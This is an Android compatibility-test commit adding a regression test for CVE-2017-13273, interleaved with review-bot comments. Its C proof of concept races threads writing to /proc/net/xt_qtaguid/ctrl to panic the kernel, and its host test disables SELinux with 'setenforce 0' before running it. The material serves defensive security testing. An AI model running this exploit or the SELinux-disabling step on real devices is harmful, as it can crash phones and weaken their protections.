CTS test for Android Security b/65853158 b/72396737

Test: successful run of newly introduced CTS test case.
Bug: 65853158
Bug: 72396737

Change-Id: Ic6da1bfe405d8a4e3f2e89364b354e376aa5bd5a
Signed-off-by: JSinha <jimmi.sinha@harman.corp-partner.google.com>
(cherry picked from commit a7e3f29dd12724d2f7f3215db1c5fb28016a7794)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f881e64..9a54760 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -146,6 +146,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-02 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
         <option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
 
         <!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
new file mode 100644
index 0000000..1cb7357
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
@@ -0,0 +1,31 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-13273
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
new file mode 100644
index 0000000..0856392
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
@@ -0,0 +1,136 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_THREAD 6
+
+int ctrl_fd;
+static int cmd;
+static int status[MAX_THREAD];
+static int sock_fd;
+
+void *thread_entry(void *arg) {
+  int index, len = 256, ret;
+  char buf[256];
+  index = (int)(unsigned long)arg;
+  memset(buf, 0x0, 256);
+  status[index] = 1;
+
+  // cmd =-1 signifies error in thread creation
+  while (cmd != 1 && cmd != -1) {
+    usleep(5);
+  }
+
+  if (cmd != -1) {
+    switch (index % 3) {
+      case 0:
+        len = sprintf(buf, "d %lu", (unsigned long)0);
+        break;
+      case 2:
+        len = sprintf(buf, "t %d", sock_fd);
+        break;
+    }
+
+    ret = write(ctrl_fd, buf, len);
+  }
+
+  status[index] = 2;
+  return NULL;
+}
+/*
+ *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
+ *which causes null pointer derefrences in netstat.
+ */
+int main() {
+  int fd, retry = 1024;
+  int ret, i, loop;
+  pthread_t tid[MAX_THREAD];
+
+  fork();
+  sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+  while (retry--) {
+    cmd = 0;
+    for (i = 0; i < MAX_THREAD; i++) {
+      status[i] = 0;
+    }
+
+    fd = open("/dev/xt_qtaguid", O_RDONLY);
+    if (fd < 0) {
+      return -1;
+    }
+
+    ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
+    if (ctrl_fd < 0) {
+      return -1;
+    }
+
+    for (i = 0; i < MAX_THREAD; i++) {
+      ret =
+          pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
+      if (ret != 0) {
+        cmd = -1;
+        close(ctrl_fd);
+      }
+    }
+
+    loop = 1;
+    int count = 0;
+    // loop until all threads have status == 1
+    while (loop) {
+      loop = 0;
+      count = count + 1;
+      for (i = 0; i < MAX_THREAD; i++)
+        if (status[i] != 1) {
+          loop = 1;
+          break;
+        }
+
+      if (loop) {
+        usleep(5);
+      }
+    }
+
+    cmd = 1;
+    loop = 1;
+    while (loop) {
+      loop = 0;
+      count = count + 1;
+      for (i = 0; i < MAX_THREAD; i++)
+        if (status[i] != 2) {
+          loop = 1;
+          break;
+        }
+
+      if (loop) {
+        usleep(5);
+      }
+    }
+    close(fd);
+  }
+  return 0;
+}
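Review bot: The retry loop in main() never joins its six threads and never closes `ctrl_fd` on the success path (only `close(fd)` runs at the end of each iteration), so over 1024 iterations the process accumulates unjoined threads and open descriptors. If that makes a later `pthread_create` or `open` fail, the test degrades silently: the failed thread's `status[i]` never reaches 1, so the first wait loop spins until the host-side timeout, or main() returns -1 early, and in both cases the host test would presumably see no panic and report a pass. The failure branch also calls `close(ctrl_fd)` once per failed create while already-started threads may still write to that descriptor. Counting the threads actually created, joining them, and closing both descriptors every iteration keeps each iteration equivalent. `cmd` and `status[]` are also polled across threads as plain ints and would be safer as `_Atomic int`.

```c
    int created = 0;
    for (i = 0; i < MAX_THREAD; i++) {
      ret =
          pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
      if (ret != 0) {
        cmd = -1;  // tell the threads already running to exit without writing
        break;
      }
      created++;
    }

    // … unchanged: wait for status == 1, iterating over `created` entries only …
    if (created == MAX_THREAD) {
      cmd = 1;
    }
    // … unchanged: wait for status == 2, iterating over `created` entries only …

    for (i = 0; i < created; i++) {
      pthread_join(tid[i], NULL);
    }
    close(ctrl_fd);
    close(fd);
```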
diff --git a/hostsidetests/security/src/android/security/cts/Poc18_02.java b/hostsidetests/security/src/android/security/cts/Poc18_02.java
index 1d6c60d..a0fd9c1 100644
--- a/hostsidetests/security/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/security/src/android/security/cts/Poc18_02.java
@@ -33,4 +33,23 @@
                                  "invalid attributes: usage=.{1,} content=.{1,} "+
                                  "flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
      }
+
+    /**
+     *  b/65853158
+     */
+    @SecurityTest
+    public void testPocCVE_2017_13273() throws Exception {
+        AdbUtils.runCommandLine("dmesg -c" ,getDevice());
+        AdbUtils.runCommandLine("setenforce 0",getDevice());
+        if(containsDriver(getDevice(), "/dev/xt_qtaguid") &&
+           containsDriver(getDevice(), "/proc/net/xt_qtaguid/ctrl")) {
+            AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
+            String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
+                              getDevice());
+            assertNotMatches("[\\s\\n\\S]*CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+                 "Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
+        }
+        AdbUtils.runCommandLine("setenforce 1",getDevice());
+    }
 }
+
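Review bot: `setenforce 1` at the end of testPocCVE_2017_13273 is skipped whenever `runPoc` throws or `assertNotMatches` fails, which leaves the device with SELinux permissive for every test that runs afterwards; wrap everything after `setenforce 0` in `try { … } finally { AdbUtils.runCommandLine("setenforce 1", getDevice()); }`. The test also forces enforcing mode at the end without recording what `getenforce` reported beforehand. Separately, the pattern `CVE-2017-132736 Tainted:` appears to rely on the kernel truncating the 64-bit binary name `CVE-2017-1327364` to 15 characters, so a panic caused by the 32-bit binary (`CVE-2017-1327332`) would not match and the test would pass. `CVE-2017-13273[36] Tainted:` covers both, assuming the stems set in Android.mk are the names actually executed. When either driver node is missing the test passes without running anything, which deserves a comment or an explicit skip so the result is not read as "patched".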